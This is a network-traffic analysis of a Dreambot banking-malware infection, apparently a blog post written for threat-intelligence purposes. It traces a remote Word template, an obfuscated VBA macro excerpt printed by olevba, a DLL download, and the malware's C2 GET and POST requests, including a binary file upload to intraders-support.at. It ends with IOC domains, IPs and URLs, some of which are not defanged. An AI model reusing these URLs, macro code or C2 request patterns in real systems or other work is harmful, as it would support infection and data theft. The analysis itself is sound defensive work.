Analyzing network traffic from the latest Dreambot infection dropped from a malicious document, targeting Poland. Analysis available at Any.Run - both an early stage and infection with dreambot. Point of this analysis is to understand what the malware does using only captured traffic, so there won’t be anything newly discovered ;)

Table of contents

  1. Table of contents

  2. Analysis

    1. Setting Up
    2. First Contact
    3. Malware Download
    4. Dreambot traffic
  3. IOCs

Analysis

Setting up

Before starting the analysis of network traffic, let’s quickly sum up what we’ll need during this task. Of course, all of the packet inspection will be done using Wireshark, but with slightly different configuration that the ones that we’re used to see in default installation. For me, the best one was written up was done in this Palo Alto post made by @malwaretraffic.

Setting up columns in Wireshark

Having that set up, let’s jump into traffic.

First contact

While scrolling through the traffic, starting from the moment I’ve enabled the capture, at 9:26:46 there was a DNS query to salesforcelead[.]com which few packets later was answered with an IP address of 192.185.225.131.

DNS resolution of salesforcelead

Keeping both domain name and IP address in mind, we can move on through the traffic. Right after the resolution, we can see an OPTIONS request to that server.

Options request to salesforcelead

Content of the request can be seen below.

OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: salesforcelead.com

Viewing the tcp stream that was used in that part of comunnication, we can see full communication, in which, later there is a head request to the path templ-12395.dotm.

Network stream between salesforcelead

Those .dotm files are document templates created by Microsoft Word, which may contain information such as layouts, settings or macros that will later be used in a document. Exporting it through Wireshark and analyzying with olevba, we can see macros that were not inside a initial document.

$ file templ-12395.dotm 
templ-12395.dotm: Microsoft Word 2007+

$ olevba templ-12395.dotm
olevba 0.54.2 on Python 3.7.4 - http://decalage.info/python/oletools
===============================================================================
FILE: templ-12395.dotm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub BMTBTe(KRykaVjys As String)
For VfElNcjOj = 55 To 130
Debug.Print VfElNcjOj
Next VfElNcjOj
Dim EQokWwAcTENjea As Boolean
EQokWwAcTENjea = True
Dim dsCsCOYPrSJwP As Integer
dsCsCOYPrSJwP = 29715
Dim YBJmUnaDadMTjfCmTNQh As Long
YBJmUnaDadMTjfCmTNQh = 174955045
Dim xAXbKsBuCkiMqCtnzagQSEecU As String
xAXbKsBuCkiMqCtnzagQSEecU = "65624568437165474b585959644d6" & "95a536e7249576e"
Dim yjAhvKrJgfCe As String
yjAhvKrJgfCe = "666e70754945746658784d4779644" & "27a684e616c7472757145"
Dim kGuQWEqHRwaimEqNq As Integer
kGuQWEqHRwaimEqNq = 28009
For CXrXALPEUrVglFTozGuDdQA = 6 To 192
Debug.Print CXrXALPEUrVglFTozGuDdQA
...

Because this post is focused on analyzing network traffic, let’s take last quick look at these macros and move on with analysis.

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Autoopen            |Runs when the Word document is opened        |
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Hex String|ebEhCqeGKXYYdM      |65624568437165474b585959644d                 |

Malware Download

At around 9:27:24, we can see a DNS query to greenedus.com with an IP address of 107.179.19.96.

Request downloading malware from greenodus

In addition to that, after the query there is a request to /wp-content/uploads/2019/09/FergKLrS.bin path, which downloads a binary from that server.

Greendus serving Dreambot

Exporting it and checking md5 hash of the binary, we can confirm it’s the same Dreambot sample.

$ file FergKLrS.bin 
FergKLrS.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
$ md5sum FergKLrS.bin 
a908e3261ee99c8fe331293b2fc11d6f  FergKLrS.bin

Dreambot Traffic

After the file is downloaded, at around 9:28:31, we can start noticing a bunch of DNS queries to services such as OpenDNS and CurlMyIP.

Ursnif queries OpenDNS

We can also see that there is CurlMyIP request sending back the IP address of the machine on which this sample was running.

Immediately after that, there is a DNS query to intraders-support.at with IP address of 83.17.95.246.

C2 Communication

What we can also see, is that the sample requests different paths on the C2 server, both POST and GET.

GET request:

GET /images/fN3m6JvsPQWfsw6bMmGn1/S_2F_2Fqjy6_2BbC/q_2BOf20dI61I4l/sIR6dJYpMmWr2eYsZa/CrvpmDF4P/7ertwODW3rpUe8o3US0m/_2B0acqJXrs8Oud4n12/GakiNCH2OtShYAdavYi8vH/oBEnzEVy8tC0J/_2Bxfslj/j9YOnK_2B1Vd50CmoRd2goL/gNXs89S60FmB/NTuJdgtdO/i.gif HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: intraders-support.at

HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 08 Nov 2019 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

POST request:

POST /images/C4q015fd6ogM9Piz/XCWXZqoJOGKW0cu/H3p332yg6iJY8m5LgY/CTufivLsP/SwPg4o0TTUaFVDeraIIB/HpK8PCWGC5JYhOjleUU/DXrLT8x64Pdf_2FiDSfhH5/yVuvg7utdcDLY/mVOvIJI3/nIE87JNf5Ct_2BHD97pWg7W/B5O6lr7vcr/UWsvNkkd9TFVZkJFv/rcgDk_2FXW6w/x2YsKRJdX/4SuMD975/j.bmp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=37855366842641924893916413627
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Content-Length: 449
Host: intraders-support.at

--37855366842641924893916413627
Content-Disposition: form-data; name="upload_file"; filename="67B3.bin"

.l...b.37.[...p.B...(m..U
..f..l...Y.`R.s;B.;P+.J..\8.t..YX.!2..."T..m..-j+.CpO<A}.g{h...}...R...I.e.}[.Z].....68.rI4....t...M....L(:.q.. .1.....S;x.......oy.7F..C...(..!f^8..N-..~.|QC.c....../`.....	..._0....M...:.x.......q.'.8]l.y.;.4...z...A........Rs.=..,....4$j.......=5.9!4......z.eRN.....BH...x".q
--37855366842641924893916413627--
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 08 Nov 2019 10:25:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

And that’s it for the traffic, after that C2 and sample were communicating using only those URLs, meaning that the malware sucessfully made itself at home.

IOCs

Domains:

salesforcelead[.]com|192.185.225[.]131
greenedus[.]com|107.179.19[.]96
intraders-support[.]at|83.17.95[.]246

URLs:

salesforcelead[.]com/templ-12395.dotm
greenedus[.]com//wp-content/uploads/2019/09/FergKLrS.bin